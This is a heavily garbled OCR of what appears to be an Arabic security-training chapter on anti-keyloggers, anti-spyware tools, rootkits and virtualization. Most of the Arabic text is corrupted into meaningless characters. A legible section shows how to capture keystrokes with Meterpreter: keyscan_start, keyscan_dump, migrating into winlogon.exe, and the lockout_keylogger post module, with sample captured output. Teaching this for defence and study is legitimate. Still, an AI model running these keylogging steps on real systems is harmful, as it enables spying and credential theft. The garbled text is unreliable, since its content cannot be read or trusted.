JjjUl (j-G JjliS JJC (ilU^a t^aUajll Jc a Igil Cilia jj^> jl£ ^ J^J CP" L L-Jxj all 4il (^J^ Cjr^ -^J^ ^ J 1 ^ " 

; jj*. jl£ AJa ^lajll 

^jfc <_£j^.VI AjJiaJl lLjLi^jjII j Jjfi\ J tCjLuo jJjiJl (jl Cilia .(jnui^Ml 4 «s 9l ^ a ^c^l jjj CjLuj Jjjill 4-ajl£x £^al J^ C-UJJJ 

lia JjVI ^lijll (jjumauH ^al^xij CjLujjjjiill a jli jt$j> jj?> jl^l ^j. 1 W^-^ C5^J ^ ' " J 

4jail^<> £tx»ljJ <Jj3 (j-d <jc t *a.*<U ^jj ^j]| jja> jii^ll tCjjjjjVI aSliA C5 ic 4 aAld ja> jK ' ojU>V^ ClalAnJaj ^Ijjajjuil a jj^. jl£ 

# jj jjj^II (j>i Aii^. (j^j CjLajjjjill 
. ciiifii lI^xjj o- 3 ^ ^^-^^ j ^-^j ls^j 'host-based IDS 

jj jjf^ll j (Jj J y** J\ ^ (Firewall) Cj\ . j^^^ ^(Firewall) 4jI^JI 

.^i^Ji ^i <ia ud^si l_jL» j1x-<ji jiijji ^-j-^ ^j^i uU' 1 ^ 

Cjljla ^^jII L-jIjjajII c_jaljjj jj£Lg cJ^^ U*^^ (^1 (>< ^ ^J.^ ^l^aJLmt . jj jJJ^^ll jl$J> (^£> l^lj* ujj ^jj ^^jll ^c>»l jill ^jjj 

.4jqKll ^ JjiJiill Jj-dJ jj^. jli^ .A£fJa3l jl ^Uaill (^Sc 

jild i4lx*a ^jjILJI jl dj^bl^ I (j^aull (JjJaLj 4jjj ^ 4_Ldl ciL <jL^aLaJl S j^J>.VI 4_xJaj| ^^ic JaliaJl 

„ jK ^xiljJ i^n/nl \^ (j^-ftJ ^^31 PS2 jjj^ll l_jIxJI j ^USB 

jjjJI (JjLuj j tj* v^ .. n (jj^l^JI fkx* (phishing emails) <J^VI ^jjjUVI jjjJI Jj^- j ^ ^ ^>*^^ 

.l^jlia^j ^ jJI jj£ ^jjjUVI jjjJI JjL-j ^ia ^jUjj pop-up blockers - 

process J registry editor ^I^IujIj jjjjj^I Jl^ ^ I^Iijjj !^ ^jULJI o»ai .1 ^ nin jl JjS ^1 jA\ ^ 

m Q u^^\\A \ (> c^^ciil explorer 
. jj* jjj-^31 J^-^ CD/DVD j> ^ C5 ^> c^jV USB ^■^nnl 

(virtual keyboard) Aj^J^ jjjUaII jl (automatic form-filling programs) y^^l ^i><u3l ^J>» j^Ijj ^l^l^l 

Jjjj* L_fl jjuj Ujtfllj* ^-j j>u3l ^J-d ^<»ljJ . j^>^ cJ^-^- (j -0 lP 3 ^*^ ( ; li^J I^jV JJJ-^I jLaKj ^Lq laJL >ia!I s-LgjujI JljkjV 
(j-d JjuJI Cjl j (JUujVI dilaUaJ ^al3jl ^J^l jl t^J^Jl J <^lj 4_j^LaJl Ajj^kjaJl (Jj > ^->1 9j1I 4_jIj£ ^IjjkjjoaV (jiajxjll 

,^jjILJI djLa jl 

.jcjjUx 4_ki_jja J£ ^ ajjIjjUI j^VI ^ jjj c^illj ^ (keystroke interference)^^^ ^1 ^I^IujI 
J J^^V (Windows on-screen keyboard accessibility) u^-*-*^ ^jliJI <^j3 Sj^LolJI sbi ^Ijjkl^l 

JiLd CjUi jls«-<i (_^l JljkjV (Jjj jUJl ^aljjkjjajl ^aJJ IjA <iV ^ 4_j^ljaJl CjLd jIslaII ^JJjuJ ^^^Jc JaliiJl cilj^QJ .(_^J^.I ^JJ^ djLd jls^ (_^l 
.^CJjlLJl <Ja. jl ^aljjklajlj JjoJI CjIaK <jIj£ (j^ ^JJ ^tJjlLJl <Ja.j3 ^ ^Jl 6(jLajjVl CjlaUaJ ^ISjl J 6 JjuJ! diUiK 

,AjjjjaJI ^il j-<JI till jjjoij ji (^jII <a jiubftll jl l^ja l_j jc. j^ll jjc. ^1 jjj^IVI ^j^l lS^^j (jg& c_j!>L^ j ^^ic jiii I 

JjJa 4_jU^J3 ojLjaxJl jjjIjjII (jjjfjljj L_fl jjuj ^jVI ^1 . jj^' J^£^ diLia ^j; jjJa AjLa^JI jj3 jj3 a jjklLujJ (^5^ Oj^ 1 ^^ 6jUia-<Jl jjjIjjII 

^aJJ -Lg jjl^Jl CjS jll ^ JJ jJJ^ll ^JjlLd <Ja. jl ^^ic 1 ^jjlj£ ^aJJ <JaijJa <J£ (J^ ujJ ^ill jl^-aJl jA jj^- J^^l ^j^-l . jjf J^^^ 6 
(jjjJl (jj-^l^xJl (jC ^LjaS <C jjjauJl Cljlllllaj£ jC. jK ^aljjkjjojl ^aJJ ,^JjlLJl <Ja. jl j JJ jJJ^ll 3Jlja. ^JJJ Li <jl£-<J! ^ jl^-aJl IjA jJ 
tiL (j-aLaJl ^aUajll (jC ^lijll .Ij^. ^alA j q fljlgJl ^ISjl j <j3j> ^i^ll CjUI uiaJl ^ISjl j JjuJI diUiK A^Jjoj (JIq <CjLk ^jialjC-V l& j^JJaJjaiJ 

;^JU3| jaull ^^Jc. 4_a.jj>Jl CjljLjaxJl ^jjj 4 jj^. jl£ -Vj^a 

,4_jajljujJaJl JJ jJJx^ll A Jxill cJ J^l 1 

,^JjlLj| <Ja. jl ^ (S b > ^ 4 Jfll > >il CjU j£a J j^. j ^aJC ^jUijJa] ^JjlLJl <Ja. jl 4-g^.l jl L^JJ^ (J 1 ^^^ 

.^ajUJl 4ij6 Jia 

https://www.facebook.com/tibea2004 ^^aa^a 



430 



_a^J (Jj^alLd jl^-^ (^1 iill^A tit La (jjaalt j JJ j-Ua^lt Sj^aI (J^3 ^£jj^ j-a^3 



Anti-Keyloggers 
anti-keystroke loggers c^^j 6 (Anti-Keyloggers) 

CjLJalalt (j* ^jAxJt . jj*> jl£ CjLi^gjj <jc t L!a£lt jlajsJ \ > ^> J> ^ jj*> jl£ dlbLja* t"u<<u^i , (keystroke lOgger)^^*^ <JjjJa 

(Anti-Keyloggers) I jp^'^j ^tjaVt ^^it AiLjaVU tCijjjjVt jjc- L_jUJVt CjI^jJj CjlcLL^altj t^JLJt cjLauaj^Altj tSju^lt 

> >ilt <Jj3 j-G \ ^JJ ^JastjJa <J£ <Jj^ ijjJ j-a ja. jK ^iaJ ^cxat jilt £>i& .4 ^h"lVt ^bVlrnt e-Ujt ^jLu^a j> AjLa^J jj^« jl£ dlbLja-G 

j jilt (^Sc 6^^J j^aL^Jt JJ jjjrt^t j^-^- i^C* 4-Iai_jJa ^t <J-> ujJ ^c-gUjj ^t ( jj^> J-^^ S^Lja-a) ^c^Ujilt tit .^-ULalt 

# 4_iCjjuj jjc. ^Jai-jJaJt (Jj^joij ^lxAjjj jt 4x.jjjuu» ^jjlixJt L»» - ^» > oJ ^lxAjjj ^t jjuj 4<!i3t jtj 

£J3 jJ CjULj o^cla JjLLg jj jjj^lt jl^J> ClAiLJt <J£ <jjLLg (j^jla (jC ^^iiw^t jj^> ji^t J ja. j (jc c jj^« ji^t dlbLjaxi J^asu 

^ sUkJt ^j^j ( jj^jLill fj j^Vt *^LjaxJt L ^a*j .<jU^i3t <^>jt ^ ^Jtj (signature database) jj^J^ 

J (virtual keyboard) V^at j^Vt ^cjjIL« .L^^ilt ^> Jjj^ij (keyboard driver) ^laJt c^L JjjL 

m A )-* > ^jL^. jjiilt ^ uj^^ (j'TuV^t djLi^jj ^j-<i ^jj'lLJt ialiiilt ^ cJ*-?^ touchscreen 



Anti-keyloggers detect and disable software 
keyloggers 

Some of the a nti- key loggers work by matching 
signatures of keylogger code with a signature 
database whFle others protect keyboard drivers and 
kernels from manipulation by key logger s 

Using a virtual keyboard or touch screen makes it 
difficult for malicious spy ware and Trojan programs 
to capture keystrokes 
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Anti-Keylogger: Zemana AntiLogger ^ 

http://www.zemana.com : j^iJt 

^t jJtj j^jK cjU^a tiL ^UJt jjj;n^t jl^ f jib c^iltj ^t^Vt ^lc^ ^t £cJi jj j^Zemana AntiLogger 
c W^t ^ dlj ^j-aLkSt ^Uailt ^ilt dia jit ^ SjLjalt ^t jJt ^jc t &juj£]Ij ^ j^j AntiLogger.^^j^ c^^^J ^ UJ^^ 
^Ullt a luaJ t jJt ^ ^t cJ jU. tit ^^j/nj jjuj <ut dii^. .(signature fingerprint) ^j^^ ^i^Jt 

t jlxil^ jt t^jjfljjfLLaltj ttiL <j^aLkjj <JaaL^Jt ^t J jj^ jit jt 64jujLual3 djjj^ JaUlilt jt ttiL j^aLklt ^aUailt ^jxi ^JjlLJt CjUjjJa (Jj^ i aJJ 

(webcam logger) S-yj 

t j^\£ Jj^j* j <(£sx Logger) SSL lS^j lS^ <ili^Jt Cjt^^ilt ^ja AjLa^Jt jSjj Zemana AntiLogger 
J^^ J 6 {screen logger) ^l^Jt J j> > > n t (clipboard logger) 4-kaUJt J j> > » n t {KeyLogger)^^^ ^Uj^ J j> > ^ 6 

.(^ * O^^jJ^b 'SSL c^J^" '(spyware) 
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i AnirLogger 1 9.2.240 



iiviarga 



Afit-WHxomLogger 



These nwdJes protect vo*_r computer from 
such *s \'TLiS«, spyi*dr*? and trepans. You n 
as a qto*jc or roviduAiv. 



(programs 




Protection SLat 
*na*r«d 



Last Analyzed! object 



16 



Si 




Copyright 



rsQhts reserved. 



Anti-Keyloggers: other tools ± 

^asu ^jjuj ^ij .Keyloggers ^3^' j O^)^ ***^ j*> a ^ t^jumV^I 2r*^ ^ (j^aLkll ^Uaill (j^tSj ^ j£i jj^> jl£ djtaLja^ 

■1^1 AiJa tiL (j^-it \\\ ^UaJl (jj^tdl Ig^al^Vlml (j^-oJ ^ill jj^> J?\ft^ S^Lja-a <j^ 

Anti-Keylogger available at http : / / www . anti-keylo g gers . com 
PrivacyKeyboard available at http://www.anti-keylogger.com 
Defensewall HIPS available at http://www.softsphere.com 
Keyscrambler available at http ://www. qfxsoftware . com 
I Hate Keyloggers available at http://dewasoft.com 
SpyShelter STOP-LOGGER available at http : //www, spy shelter . com 
PrivacyKeyboard available at http://www.privacykeyboard.com 
Elite Anti Keylogger available at http://www.elite-antikeylogger.com 
CoDefender available at http://www.encassa.com 



low to Defend Against Spyware 

Au uJl cAiUJ! Jl* ajjjoJI dLa jlx-<JI j ^A^Luaxll (jj^ ^AaJLuiAll ^Uaill ^^ic. CiiiiilU ^ jij a\u\ ^^1 jj Spyware 
4 6^pJI djU^ ^j;^ cJaa^j J!^. 4_louj^)3I j^U^xJI <j>» s*i^l j ' m( ^& ajuAjA j^U^a Spyware 6 <J j 3 *^ dj!)t^juij 

I^Vl^ (Jjjjoi^jII ^1 jj .Ua ^li^ll (Jjia .l^JjUj lie. UjUIj ^jjjjai^jll 
(jjjjai^jll £c-gI jil (j^ajill (j^ ^jAslSI jSjJ <iV (tOO lOW) 4_jJaikia ^1 tiL ^U^aLaJl dljjljVI (j-al jlui* n >ij I^jI ^ jSl! V 
jl AJlc La] tiL (j^aLkll dljjljyi (j^a^xJjaixJ Lajb (jLaVI ^l^c] (J£*J ^aJJ ttillil ,tiL (j^aLkll JJ jJJ^ti j^-^- \ (pjffi 

# ^jjjjud^j3l ^c-al jj (jx» jj jJ la^ll 4_jL<^J ^Jajaj 
^tiL ^aLkJl jfi jJi^ll jl^-^J jJjubd ^ ^ 

(jl tilU^ (jl L— _(jja j^>*-ft jjje. (jJjajj-d (jxi 6^jl jll djliLJI djlsa^i j <a jjjuIaII ^ jjj^IVI ^^>^l lS^^j V 

^j^)JI JjLojj ^ 1 ^ a\m" a! jjjla ^1 j-<i ^iij V . jj jjj^ll ^^^Jc (Jjjjuo^jII ^iljj jl ^freewcive 'u^ jj^ lS> 
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.(jntn^^l ^Vijl a**) ^ jsH c— _ (Anti-spy ware software)u jjjud ^^ cjULnlajj ^ail^ll jJI 

(J^IaJ! ^Uajll I ^JJJJJ ^JJ ^jll (jouui^jll 6 ^ *^ cSjVI ^li^l Jak ^&AntispyWare 

.(jnui^Ml ^jW^ CS^^J ^ (J^al^Jl ^Uaill (_£JJ-^ (J^^J 

. (MS Configuration Manager reports)^^^ Sjtal j^j^j {Task Manager reports) >J4 j^j^ fLkub ^$1^ 

.liljj j-nm dlaJ ^jjjJ <_£,j]l JJ jJJ^ll ^aUaj ^I^Viml ( . UaJ 
t^cxaLjj ^1 (Jj^Vi <Jj3 .Sj^Jl LliLi^jjll l_u£jj j ^—^J^V^ cs - ^ ^c^ 1 J-^^ ^ Aa^Lujl t . l^J Lajb 

-laiijj <^jJ1 jj^iJI CjL^jjj^j j t^jUiVl jj-^^ jjII <jalij1 lIjL^jjj^j ^ ,j£Li ,<j Jjjj ^ Cy* j& 4j1 Cy* 

.(J-Ia^jH JjS ^jJalj ^3 ^glc <J ga^l3 1^1^. Ij£j ^jl VJ *;* , J .^lxAjjjII 
.(JjjjuixJI UJ^ La,jjc. Lfc,JjijJ ^aJJ j"-^^ ^c-aljJ (Jlxi SjLjall ^c-^I^Jl ^jV 4-JJjJjJa ^aJ La Sjl^Vl ^-^J ~ I^JLujJ V 

,t*L (j-aUJl ^Uaill <L1£3! ojIaJjuJl j-Laal^all J-^^J ^ tciUil ^JJJ j 

a U.v<*sfi j t^jLujVl AiLkj djLUj ^ ^jq^i\1j t^ijj^axi L_jLai^. J jj^a jll (public terminal) 3-aLJt ciiUs jlal I ~ iklujj V 

JJ.JJ 4£jjuJI .(jjyi,JjkjjuuJl (j-a ^jAslSI <Jj3 ^j-d l^Jl jj^ jll ^aJJj t^j^UaVl (^^^C 4_L<J dljau] 4^1x31 4 .l£^>^^ 4_jajLud^Jl 

^xiljJI d^a Jj^^Ij ^ jSj LoAic. <iV djjijyi 3 <uujjia3I 6 ja. j3l jl t screensavers'^W^^ C5%^ j - ^^ ^^i^ <J^3^ ^ V 

JW M J ' (your computer may be infected ) L?L^ jjSj ciL ^UJI jj jl^ jl 

J 4? ialjill 6^ ^ jSjII tic . (they can help your computer to run faster )p 4? j^j^^l 

jj jjj^ll j^?> Ajisj^J! CjULJIj ^tjjLill t^al ^<JI <jjjUc caches cJ^^ (cookies) -^-^j*^ ^Aj^*^ ^— ^L4Lq < ala 

C5^^ C5^^ L&-° tLaLaJ tilj jlaJjoa daJ ^jjjJ JJ jJJ>a£ ^UaJ ^^ic <j3Li jl <Jj uj CliLi jls^ jj jajj ^J V 



Ant:-Spyware: PC Tools Spyware Doctor ^ 

http://www.pctools.com :j^JI 

L_a^ .s jjiaaJI aj16 ^ ajjjjUI jjIIj (j> iu 0 M I jj jjja ciL ^-aUJI ^Uaill AjUaJI jSjj PC Tools Spyware Doctor 
l^a. J^Jl c> .^4? oa^JI ^^il c> ^ 'spybots Oj^J^ 'Trojans ^adware s jLjall ^1 jJI < atLk^ 

Li^JC > hj ^li^ll (j^J DjjJaaJl CjI^j^jII (h5 Ja. J^A ^1 laJLujl J ^jjjjoiajll ^x»ljJ AjJa AJLJI jl <iL <j^aLaJI 4_jjjoJI CjLi jlx-<Jl <jLaa. 

_tiL ^alaJl ^Uajll (jjdjoiajl! ^c-dl jj] Jxill <Ja.^j3l <JjS £yz I^Ja. CjliLJl (J^aa3 ^aJJ .AjLoaJl ^ A alia o dAJLla ^ ^dLjjjl I^A (J-dl^JJ 

o 
o 



PC Tools Spyware Doctor 
delivers simple protection 
against dangerous spyware 

It stops and blocks spyware 

It checks files before they 
can get on your PC and 
corn promise your computer 



PC Tools | Spyware Doctor 



Protection Summary 









1 B 


littKwd rrr'f-lnr 




L* 


Start Stan No* 




O 


Tiir-..J++ HttVlliDltrtVNKH 





h C p Ctoo/S - com 
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Anti-Spy wares: other tools <4 
< dialers 'u^-jj^j '^in^JI <-!^ u ^y^ ^ ji ^j^j i> (Ji^lj u& <j-aUJI ^IkJI o-^^ij j& AntiSpyWare 

£aJI cjSjI! ^ ^jU^JI ja jj AntiSpyWare ^\ j ^\ jjkJI ^ lit ^1 jjj < rootkitsj < Keyloggers 'worms 



CjLi^a^J! o jlk (jLdjJal j/1 jl±x£l\ Q SJ ^ajSJ .^J^JJ J' ^JC- ^f^^ ^ alalia CjI^jS Cf-^* ^ sJ ^ ^ ^ ^aUaill (j^a^a ^J^)Ia 

SUPERAntiSpyware available at http ://superantispyware.com 

Spyware Terminator 2012 available at http://www.pcrx.com 

Ad- Aware Free Antivirus+ available at http://www.lavasoft.com 

Norton Internet Security available at http://in.norton.com 

SpyHunter available at http://www.enigmasoftware.com 

Kaspersky Internet Security 2013 available at http://www.kaspersky.com 

Secure Anywhere Complete 2012 available at http://www.webroot.com 

MacScan available at http://macscan.securemac.com 

Spybot - Search & Destroy available at http://www.safer-networking.org 

Malwarebytes Anti-Malware PRO available at http://www.malwarebytes.org 



Key Scan and Lockout Keylogger in Linux 

^1 j UjLoj Igic Uj^j ^1 j L-fl^^LudJi jlg^J! ^iilLJI CjlkiuJa JallilV s s^li <J Metasploit J-M J Meterpreter 
.Metasploit ^^-^ J-^ ^ s-UijL LLaa j JxilU AiljikU LLaa ^ill ^Uaill ^ l^iLaj .Keyloggers l3^^ 

jll (jjoii J LLLoj U£ Meterpreter J ^fo ^ 



Key Logging with Meterpreter 

.Meterpreter ^ ^ >«ijV( ^j^j ^jL lJj^ Meterpreter ^aj^ J help <^Lk> ^Ull ^ 

jal^kiujl 1 La^j L* tillil .^iilLJI djbjjja <jal^<J tilli j Keylogger j *I^V Meterpreter ^ .v^nl 1 \a^^ ^fil 

. key scan 



kGyscandump Dump the keystrokG buffer 
kgyscan_start Start capturing keyst rokes 
kGyscan_stop Stop capturing keystrokes 



.Meterpreter ^ jL J^Lk ^> keyscan_start axj jo ^iilLJI CjUjjja ^ j nu^M t 1^ 4-LLouj . l 



mete rp reter > keyscan_sta rt 
Starting the keystroke sniffGr. . . 
mete td reter > 



^^jJa^ll j tljjJ JllxJl lS^* 1 (^C- ^^-Ic ^UjoiVI (jiaxJJ ^a^J^ A-l^jJa3l ^ajflJ (^^^ jUalj^l ^1 -la^a ,2 

.keyscan_dump tdli ^LLouj ^ U ^liull ^1 ^j^l *^ .3 



keyscan_dump 

Dumping captured keystrokes,,. 

google.com <Return> will Dallas go 8 an 8 again this year? <Return> 
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<jc tliaJU ^IS olLa J "go ogle. co in" ^M-^ ^ L_ogJI ~ i^jLuiaH q\ q^jxW 11a ^ <jt sj 

"Will Dallas go 8 and 8 again this year? " 

£A J^ (J-j*juJ^l ^aUaj Jc (_£^)^.l 6J-a L-l&ij <jVI . JJJ-^ A^ftlS £x» J l£^>^I J J^-^l (Jj? ' ^ ."L" ^^-*J " jj^j" 

U keyscan_dump 



met q rp ret q r > keyscan_dump 
Dumping captured keystrokes, . . 

<:LWin:> 1 
mQtQ rp ret q r > [~ 



<_£^kl 0^)>» (Jjl^jaulL ^ala 4-^3j A-uiLuill L£^lj 1 ^ (J^-ulJ L + jj-^J J^-** J^ S" 5 ^ - ^^ 4_l^jJa3l jl^-^ (J I (S^y Lft£ 

[l^il^joaJ ^aJJ ^aJ liLal ?jj^<Jl ^jjU t4.uiL.rtll ^Ic. s-li-IV JJJ-a £a 

cJ J^-^l <Jj-> > >n 4_iij <jc c allkj L_u£-<Jl ^Jajuj 4_liJ Q\ i4 Ll > nn C : *n^> . jjAiijll <j-aVI ^aUaj tgJ (J-a*J ^^jll <L^]a3| ^ <J£jouJ| 

l^ax1\ * 1 ula ciijl£ lij !il a 3 alia o ^jjILJI jl ^ i^jLujj l^J!)lk ciu^ ^<J j^.^ ^jUr>^ win logon <J ^>^^L Lil ^l_u£-<JI ^^-^ 
C5-^ Keyloggers l!^ ^^i^ <— i j^j .c^^J^ (jj^S*!! jl 4 J * ^ ^L^u ^aLkJI ^iilLJI Jalilll kj > >n ^jla l_u£a3I ^Jojoj 
^Jajuj Alij ^ Winlogon c^^Meterpreter ^j^ 3 t — * ^Louj 44_ILaJ! ^k .1^5! j>» ^^11 J-^^ 

.^^kl keyscan >^ ^ . ( ^ ^ (jc ;^ 1 ^ ^ LLaiijl migrate i^i> J ; l_u£-<JI 

PID J jj^JI cli^aj . j VI Ja*j ^1 cjLUsJL ^ta J J t ^^ Meterpreter j^/'^h^ ^k A^Uiaj ^jij .4 

.Winlogon ^AaxJIj ^-aUJI 



meter 


preter 


> ps 






Process List 








PID 


PPID 


Name 


Arch 


Session User 


d 


0 


[System Process] 




4294967295 


A 


8 


System 




4294967295 


236 


4 


smss.exe 




4294967295 


316 


1404 


j usched .exe 


x86 


1 WIN- 


0 rarr 


Files\Common Files\Java\Java 


Update\j usched .exe 


336 


304 


csrss .exe 




4294967295 


388 


380 


csrss.exe 




4294967295 


396 


304 


wininit .exe 




4294967295 


432 


380 


winlogon .exe 




4294967295 



Meterpreter l& <-* 432 yr* winlogon.exe o^UJI PID u' ^ s jj^ll ^> ^ jj U£ di^ 

.PID Jl liA Jl (session) <^ Jl 
.migrate 432 uj^j ^ J PID ^ migrate j^VI <xjUoj ^jSj .5 



meterpretG r > migrate 432 
[*] Migrating from 2688 to 432... 
[*] Migration completed successfully. 
meterp reter > | 



system ^^1 CjL^^a Jl citL^X^ ^kj Jl j-H^j u^j^k insufficient privileges LLaJI ^SLuj j J^ ciiL^ lil 

.privileges 

.keyscan_dump ^ ^ keyscan_start j^VI ^j5j jVI .6 
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Meterpreter t> use post/windows/capture/lockout_keylogger ^j^VI L^J c^jSaj 



- f -i:.''^-i > background 

[*1 Backgrounding session 3.,. 

rosf exploit (by pas sijdt ) > use post/windows/capture/lockout_keylogger 
msf post ( lockout keyiogger) > set session 3 
session => 3 

msf post(lotkout_kcyluggei ) > exploit 

[*] Found WINLOGON at PID;3824 
[*1 Migrating from PID:3484 

|[*| Migrated to WINLOGON PID: 3824 successfully 

1+3 Keylogging for WIN-LQANLQTPQLU\Ralf Q WIN-LQANLQTDQLU 



HIDING FILES 5.6 



ciAlnlaj]! i j (, ajuj£ J\ ^i* ftj^Ult (protective application) *Sh^ jII ciAlniaSlI ^ ^jaxJI U-kajl ti!U& tAlu^JI ciAJLuLjII <Jla 
(jjiA^ig-xJ! ^ajL L— Li^ ( (protective application)**-^-* jft ciAliA^] JjS <li±kj| cjlinJaiill l-aLou^I ^jj <jl < . uao <J^J ,<ln^JI 

.^j^l ^ JJ^ dilil* 4 InaJl CjULJI 



Rootkits 

Rootkits 'o^f^ ^^alU . IjjjSj U sjIc j < Rootkits j^j 6 Jj^ ^ ^ 6 MetasploitJ^ 

eli^V I^I^jjujI (j^j Rootkits . j2 jj;^^ cs-^ of""* ^ . ^ j^j-^ ^ dAiLJI ^likl ^^ic dj^II c*laJ sj 

U sjIc b aSj jSSVl djLuj jj^JI j^Kfl ^ c> Mj^' uj^ ^ W^- tdjlilAJI 1^ <!Ui Rootkits 

< (wot/admin access)(j jt^VI ^Vim^ l jl ^ jiaJI ^^kl^JI ^ JUJI L£ 6"root" i> uj^ Rootkits ^ u) 

,^^1^31 4^3^ <J^-^ ^ ^ ^ j^VI o* ^ * ^5^*^ J "kit" j 
^jt > ^ tilli Laj ^jialjc-Vl <c jild <c j-<^<J ^^kjjoaj ^j) (j^j .(stealthy) Ajj^Lo (JjSj Rootkits tl^A^ ^j^^ 

l_l^3I * jjIS Rootkits c> .c5 j^Vl s jjj^JI backdoors j^j ^W>^ cJ^^j ^cj! jUl^VI 

jj-dJ Ullc. t4 n-y ^ ^\ CjLuj JJ;is3l 4-a^l£^> < -^ d ^^>j^ AjtiaS ^H^J LdAjc ,^L!aj3l (^5^5 c5 ^ UJ^ 

" .l!^*-^^ ^aUaj U%*^ ROOtkitS L)^ 3 *^ J^^' ^(S cJ^-^V C-!^*-^^ ^Uaj ^j-d CjUjIu^q t . ilia 

t (JjAKjuSSll ^Uajj ^iljjJ! ^jjj 4 all^ A\ CjUIhII (jialjjcl jl " hooking 
^jjal i^Ull Jllftl! f^k jlajll .AjxjJalt <jU1miVI Jjaxj j^la Rootkits ^^j^^jjl c> c> s-^m ^ 

^ jij ^jjjUI! ^jax a ^^jII CjUi^Jlj CjUIaslSI ^jiajcj ^jl^j ^ ^i^^jjoiaII ^aujj l_a jjoi li^j Ctrl + Alt + Del 

,Ui^a ^gjJa^SI ^aJ aJaslSI ^jiajc ^lajllj ^ajL Cilia jJ^fljll ^jj^ oi^ llilL 

^jV fc^li j J^*j jj-oVI pj^aj c_a jjuoa t^cjj^ll li^J Rootkits ^ ^ > ^ lij j .5^1511 ^^jj ^ J^t-uu11 ^IjJI 

(j^J ^jUt^I <Ajla (J^ajC ^Vlm^l J jU^J UiAic C Jjxjuali ^aUaJ Jj3 ^ CAj aJLoaVl J (J^alj^ci bjSal\ l^J^ ROOtkitS 

^alc ^^^ic ^jjiil ^^JjouJIj Jjill (^^ic (>— iAaJ li^ .'Lajlil! ^ lIjUIaslSIj ;CjL<»^J!j tSjlla a ^dl^>J ^Jl jj ^JaLoUJ ROOtkitS 
(jli t^lsLxJl .<-!^*-^^ ^UaJ ^j-d Jj3 JaJjJallj jJjlflJ ^a^flJ Cilia .(^^ ^5^* cS-**^ J^^ J^^^^^ 

Jj*juSj1I ^Uaj Jx^j ^ill ja Rootkits 
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.fUajll exploit ^ u' ^ f% *<^t Rootkits .exploit Rootkits 3 J) i> 

-C5 ±k]| jjioi^ll J jj^a jll (^ic iali^JI j jJ! jl cjULJI e-lLkV Rootkits ^vi^'i ^ S-^-c- j 

Jjj^ajll l^i^klaai (jlxiJ ^1 b jUiall Jill ^ i>i& .I^LulSSI *JJ jl JJJ^*£ jU^ C5^) Jj^J^ ^ ^ CS^ ROOtkitS 

^1 iiiii ^^1^13 jl^j ^Ikd! ^1 ^ jlaJI ^^klaiJI fJu Jj^JI c&j^ i>- .ftkd! (root/admin) j^VVlS 

'IRC bots 'log-wiping ^ j '(Sniffing Packet) l)^^ f 'DDOS jjj 'backdoor ^ c> j^l 
JjVl cWl ^ v^mj . (file attributes)^-^ cjUj^ ^ Jjl^ ^Ua .attributes i> ^ 5^ 

*j ^ill s ^31 j^I <-_L-aj .read-only jt 'archive 'hidden 'H uj^ ^ cs^Ls 6 (format of the file)^i^ 

j GetFileAttributesEx() ^ jll .^11 Jj^ '^ J^jJ! ^ g?^ ^ jll 'U^ 

li^j GetFilelnformationByHandle() 
t^ujall djUL cjUjoj jjj^j jl t^lLkl ^.1^13 ^j^j . (file attributes)^*^ CjUjoj jl ^ ATTRIB.exe 

JjlaJI f iiH-Aj Rootkits 

.c_jUW! ^j^^ c> <c ja^a ^ Rootkits c 

,(^JI 4 jj^jjj si <J!)lijjaj|j (j^^xJ! <xjuj jjl^i tCjl jLiLdVI 1 ^ ^) zero-day ^ JP^ 3 ) 
(Means of a link and a bot from IRC, ICQ, etc) .£11 'ICQ 'IRC <> 6> - 

,^^lxJI (JU^jVI djULao ^ l^-La ujj ^jj ^^jll CjliLJ! j! liLoai j! s jjj > o a 

:4JUI) uiuSU Rootkits tj^-i^j <> ^ lj ^ i 

Types of Rootkits 

djLuiill j^ <c. a cAla jj Rootkits 6 ^ .backdoor jjj^^ c^j* 1 ^^ c5 J jll jj^l^ll ^UjJI 11a 

j .<^.H<JI Rootkits c> ^} ^ .f j^J^ j^-^ j^j^ Rootkits .^Uaill s j injuiti 

Hypervisor-level Rootkit 

Dj^nJI Virtual Machine ^ ^j^^ ^ Virtualization cJj^JI ^> 

Ia jjc.j VlMWareJ^ ^^-^ 6 ^ el) -0 j .c^^^^ jl ^ 11 ^jc <Jj^iLa cJ^*-^ j ^ A " 

s j^Vl Sj^a J!)Ulajl J!)U. U jUijj alj U Hypervisor-level rootkits s^^*la ^^l j^. <^Uj 

<d ^ c-i ^Liuil l jl^aJl J^il( ^Uaj ^ J^Uli Rootkits . AMD-Vj Intel VT (Exploiting hardware feature) 
^jill .^^Jl cjj ^u ll ^Uaj Igj ^\ ^\ oj^VI djI^lc^iLajl ^^i^ jjc^I ^ (virtual machine) ^ 

4_^Li ^ V^j J^^U ^jij (The system f s boot sequence) J^-^/^-^ Ckj^ iF- Rootkits 

.(original virtual machine) yA^^ c^j^^ JU^^ 
Virtualization Jl Wj^ Hypervisor-level rootkits^ Virtual Rootkits J j& 
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Hypervisor - 
Virtualization strategies - 
Virtual memory management 
: JIa Virtual Rootkit J* <-5j*^ ±i 

Escaping from a virtual environment 
Hijacking the hypervisor 

Virtualization 

^ Uj^ Jaxj OS J^> ^Uaj JSI ^ ^1 jll jl^JI Resources ^Jj* <^ yr* J^^h Virtualization -SI 4jLc 
jjl ^\-±ja ^1 J J^*-^ (JjixjaLil £>^j! ^ <JfL jl^-aJi Ja*j <jl£ Virtualization Jl J^ j .^—^ j^l 

IMemoryuO^I 4-*-^ s^jj Ljajlj ciA-^Jl* <cUj^ Jj s^_^.VI Cj! j^a dii^. ^^lill SjjU^ll s^iUl a*j a > <a1 ^ jl^Jl 
cJiijl Uiajl jll cs - ^ AVeb Server jffi J^*-^ j^j^^l L — ^ ^Ij^j^^l J u*^l j^-^l 6 ^ ^^jjojjj 
Linux Jl jj-^j^l J^*-^ J^ J^*-*-^ ^Uaj j5£l l!^*-*^ ^vim^l ^ * "j ^— ^ PC ^pUI c^l j^-^I 6 ^ 

Virtualization of system resources 
Virtual Machines J' 

J^ul jL-a3aL Application Virtual Machine ^^>s L^l Process Virtual Machine JjVl £>JI -1 
L^l *ti^Vl Dot NET Framework Jlj Java Virtual Machine Jl J^dl fUij ^ 3-n*-*Process 

. Virtual Machines^** jll s j^Vl C! ^^ c^i ^ j^is 
lUxj ^£1 u ^ > ^^ ^ j Hardware virtual machine System Virtual Machines yr^l & j^I -2 

Hypervisor 

Handles System if- Jj>^31 Virtual Machine -J jU-a^l VM Hardware VM Jl j^Uc ^1 ^1 
Jj*JsII j jjl jJI 4_jL^ jjjj Ljajl j Host System jfl jW*^ ^ J^ ^ VMs Jl J^level virtualization 
